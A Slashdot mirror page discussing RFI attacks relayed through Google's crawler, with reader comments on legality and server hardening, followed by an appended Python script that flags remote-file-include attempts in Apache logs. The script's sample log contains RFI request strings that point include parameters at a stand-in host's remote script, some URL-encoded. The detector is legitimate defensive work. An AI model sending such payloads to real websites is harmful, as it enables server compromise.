Slashdot Mirror


Anonymizing RFI Attacks Through Google

netbuzz writes "Noam Rathaus on his SecuriTeam blog describes a technique by which 'Google can be utilized to hack into websites — actively exploiting them (not information gathering by the use of "Google hacking," although that is how most of the sites vulnerable to RFI attacks are found).' He cites examples in the wild and even mentions that the technique could be used as a 'covert' communications channel."

6 of 66 comments

  1. but is it a crime... by Sensor · · Score: 5, Interesting

    There is actually quite an interesting aside to this: would someone who used this technique actually be guilty of hacking? After all, they don't run the exploit and arguably can't guarantee that anyone will.

    If I happen to create a utility capable of cracking a site but then store it for research, never distribute it and never actively use it, then I've not committed a crime. If I distribute it to other researchers in good faith then I'm covered - at present it's only the person who actively uses it that is guilty of a crime.

    However, in this scenario (even if I could be traced) it's arguable that *I* never attacked a site; all I did was place a tool that could be used in that way in a public location. I'm not sure that would completely stand up given the recent amendment to the UK's Computer Misuse Act (i.e. reasonable belief that the tool would not be used in that fashion), but still...

    As always it comes down to people...

    PS:
    As an aside, I am currently running a survey for my MSc dissertation on IT admin access to confidential information. If you'd like to help out (and would like a shot at winning a £25 or $40 Amazon voucher) then please take a look at:

    https://msc-survery.priogenus.com/amazon.php

    1. Re:but is it a crime... by MartinJW · · Score: 2, Interesting

      I'm not so sure. The intent is there to commit the crime, and it's safe to assume that once the attack has taken place, the malicious user will be utilising the now-open security hole for further ends. I guess it's a bit like getting a friend to kill someone - you would still be guilty of murder - wouldn't you?

    2. Re:but is it a crime... by Sensor · · Score: 2, Interesting

      Technically "conspiracy to murder", but could you prove the case if you left a note in your "private" diary that you thought someone could be killed in a certain fashion... and someone then read your diary and chose to act upon it?

  2. Re:change behaviour for bots by Anonymous Coward · · Score: 1, Interesting

    If you do that, prepare to be delisted from search engines or at least severely downranked. Showing different pages to bots than to regular clients is called cloaking and, since it is a technique primarily used to spam search engines, the major search engines test for cloaking and punish it. Technically a page is addressed by the URL, cookies, user agent, referrer and other pieces of request information, but search engines expect that you deliver the same main content for the same URL, all other request data be damned.

  3. Re:How not Who by deryckh · · Score: 2, Interesting

    Agreed. The problem I have with these sorts of things is they act as if the problem is with Google. It's not (or any other search engine for that matter). The problem is with the site that is vulnerable. Fix the security hole and there's nothing to worry about.

  4. Simple solution by vivekg · · Score: 4, Interesting

    Seriously, I hate to read articles like this one. They don't offer any solution..... These kinds of attacks are not new at all; you can find tons of such attacks in the access.log file:

    tail -f /var/log/httpd/access.log

    First, get rid of fat Apache and use something small and secure like lighttpd if you are running a *small personal* web site. Second, put lighttpd / Apache in a chrooted jail and no one can install a *php/perl* shell. I have documented the procedure for putting lighttpd in a jail:

    http://www.cyberciti.biz/tips/howto-setup-lighttpd-php-mysql-chrooted-jail.html

    Both Yahoo and Google run their entire web servers in a chrooted jail. The other choice is to use OpenBSD, which runs Apache in a chrooted jail out of the box.

    --
    The important thing is not to stop questioning --Albert Einstein.
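The comment above points at access.log as the place where RFI attempts show up. As an added example (not code from the commenter or from the SecuriTeam post), the script below parses Apache combined-format log lines and flags requests whose query parameters carry a remote URL, the classic remote-file-include signature (including the trailing "?" attackers append and URL-encoded or double-encoded variants). It also records the User-Agent, so attempts arriving via a crawler, the scenario the article describes, stand out from direct ones. The log lines are constructed for the example, and the allowlist of parameter names that legitimately carry URLs (here only `q`) is an assumption a site would tune for itself.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample traffic in Apache combined log format (not real log data).
SAMPLE_LOG = """\
203.0.113.7 - - [10/Aug/2007:12:01:33 +0000] "GET /index.php?page=about HTTP/1.1" 200 1423 "-" "Mozilla/5.0"
198.51.100.9 - - [10/Aug/2007:12:01:40 +0000] "GET /index.php?page=http://evil.example/shell.txt? HTTP/1.1" 200 512 "-" "Mozilla/5.0"
66.249.66.1 - - [10/Aug/2007:12:02:05 +0000] "GET /include.php?inc=http%3A%2F%2Fevil.example%2Fc.txt%3F HTTP/1.1" 200 512 "-" "Mozilla/5.0 (compatible; Googlebot/2.1)"
203.0.113.8 - - [10/Aug/2007:12:02:30 +0000] "GET /search.php?q=http%3A%2F%2Fwww.example.org%2F HTTP/1.1" 200 900 "-" "Mozilla/5.0"
198.51.100.9 - - [10/Aug/2007:12:03:11 +0000] "GET /view.php?file=http%253A%252F%252Fevil.example%252Fx.txt%253F HTTP/1.1" 200 512 "-" "curl/7.15"
"""

# Apache "combined" LogFormat: %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# A parameter value that *starts* with a remote scheme is what an include()
# of user input would fetch; that is the indicator, not the presence of a URL anywhere.
REMOTE_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)

# Assumed allowlist: parameter names this site legitimately fills with URLs.
DEFAULT_ALLOW = frozenset({"q"})


def parse_line(line):
    """Return the log fields as a dict, or None if the line is not combined format."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def rfi_indicators(target, allow=DEFAULT_ALLOW):
    """List (param, decoded_value) pairs whose value is a remote URL."""
    query = urlsplit(target).query
    hits = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        if name in allow:
            continue
        # parse_qsl decoded once; decode again so %253A-style double encoding
        # does not slip past the scheme check.
        decoded = unquote(value)
        if REMOTE_RE.match(decoded):
            hits.append((name, decoded))
    return hits


def scan_log(text, allow=DEFAULT_ALLOW):
    """Return one finding per request that carries an RFI indicator."""
    findings = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        hits = rfi_indicators(rec["target"], allow)
        if hits:
            findings.append({
                "ip": rec["ip"],
                "path": urlsplit(rec["target"]).path,
                "params": hits,
                "ua": rec["ua"],
                # Crawler-relayed attempts are the case the article is about.
                "via_bot": "bot" in rec["ua"].lower(),
            })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        tag = "via crawler" if f["via_bot"] else "direct"
        print(f"{f['ip']} {f['path']} {f['params']} [{tag}] {f['ua']}")
```

On the sample, the `page=about` request and the search for a URL in `q` are not reported, while the three include-style requests are, including the one relayed by a crawler. Run it against a real log with `scan_log(open(path).read())`; the first mitigation remains the one the thread names, removing the include of unvalidated input, with the log scan telling you which scripts are being probed.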